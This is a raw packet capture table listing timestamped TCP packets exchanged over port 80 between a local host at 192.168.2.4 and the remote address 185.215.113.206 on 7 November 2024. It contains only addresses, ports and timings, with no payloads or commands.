Nov 7, 2024 04:12:21.457670927 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457679987 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457683086 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457685947 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457693100 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457696915 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457703114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457706928 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457711935 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457717896 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457734108 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457740068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457752943 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457775116 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457782984 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457793951 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457793951 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457809925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457818985 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457822084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457833052 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457844019 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457845926 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457855940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457868099 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457875967 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457879066 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457885027 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457890987 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457911968 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457915068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457931042 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457933903 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457942963 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457953930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457962036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457964897 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.457969904 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.457993031 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458004951 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458009958 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458015919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458029032 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458035946 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458040953 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458053112 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458061934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458065033 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458074093 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458076000 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458090067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458101988 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458112955 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458115101 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458115101 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458126068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458138943 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458148003 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458148956 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458162069 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458177090 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458178997 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458184958 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458190918 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458201885 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458210945 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458214998 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458236933 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458245039 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458256960 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458259106 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458268881 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458280087 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458282948 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458291054 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458293915 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458309889 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458311081 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458323002 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458333015 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458333015 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458345890 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458358049 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458363056 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458374023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458389044 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458391905 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458410978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458415031 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458420992 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458436966 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458436966 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458446026 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458450079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458462000 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458471060 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458475113 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458496094 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458523989 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458537102 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458548069 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458558083 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458570957 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458581924 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458591938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458592892 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458604097 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458612919 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458616972 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458627939 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458657026 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458667040 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458677053 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458687067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458697081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458708048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458714008 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458719015 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458725929 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458730936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458743095 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458751917 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458754063 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458776951 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458781004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458791971 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458798885 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458802938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458815098 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458827019 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458827019 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458838940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458844900 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458862066 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458868980 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458880901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458884954 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458892107 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458909988 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458923101 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458935022 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.458981037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.458992004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459002018 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459017992 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459028959 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459031105 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459039927 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459048033 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459052086 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459059000 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459064007 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459074020 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459076881 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459098101 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459105015 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459124088 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459165096 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459177017 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459186077 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459197998 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459211111 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459213972 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459224939 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459233999 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459234953 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459244967 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459252119 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459260941 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459271908 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459301949 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459346056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459357977 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459367990 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459379911 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459388018 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459392071 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459402084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.459415913 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.459429979 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497402906 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497447014 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497457981 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497467995 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497473001 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497522116 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497549057 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497560024 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497566938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497596979 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497628927 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497641087 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497651100 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497663975 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497675896 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497692108 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497692108 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497703075 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497724056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497735023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497735023 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497764111 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497809887 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497822046 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497833014 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497843981 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497854948 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497858047 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497873068 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497890949 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497936964 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497950077 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497960091 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.497982979 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.497994900 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.498006105 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.498013973 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.498024940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.498034954 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.498039961 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.498048067 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.498066902 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.498074055 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.498078108 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.498090982 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.498102903 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.498110056 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.498114109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.498136997 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.498156071 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.567527056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567544937 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567555904 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567569017 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567612886 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567624092 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567625046 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.567671061 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.567675114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567687988 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567699909 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567709923 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.567742109 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.567831039 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567873955 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.567903996 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567914963 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567925930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567943096 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567945957 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.567955971 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567966938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567967892 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.567979097 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.567980051 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.567998886 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568010092 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568017006 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568028927 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568042994 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568057060 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568090916 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568101883 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568111897 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568123102 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568123102 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568140030 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568150997 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568161964 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568165064 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568173885 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568177938 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568191051 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568202972 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568208933 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568214893 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568226099 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568234921 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568240881 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568252087 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568258047 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568264008 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568283081 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568304062 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568310022 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568316936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568334103 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568340063 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568346024 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568357944 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568358898 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568378925 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568403006 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568454027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568492889 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568495035 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568506956 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568530083 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568538904 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568578959 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568589926 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568600893 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568612099 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568620920 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568644047 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568655014 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568659067 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568674088 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568680048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568701982 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568712950 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568732023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568743944 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568768024 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568772078 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568783998 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568794966 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568804979 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568814993 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568815947 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568828106 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568839073 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568840027 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568861008 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568880081 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568892956 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568912983 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568923950 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568936110 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568943977 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568948030 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568959951 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.568974972 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.568993092 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569009066 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569020033 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569031000 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.569051981 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569075108 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.569102049 CET	80	49755	185.215.113.206	192.168.2.4
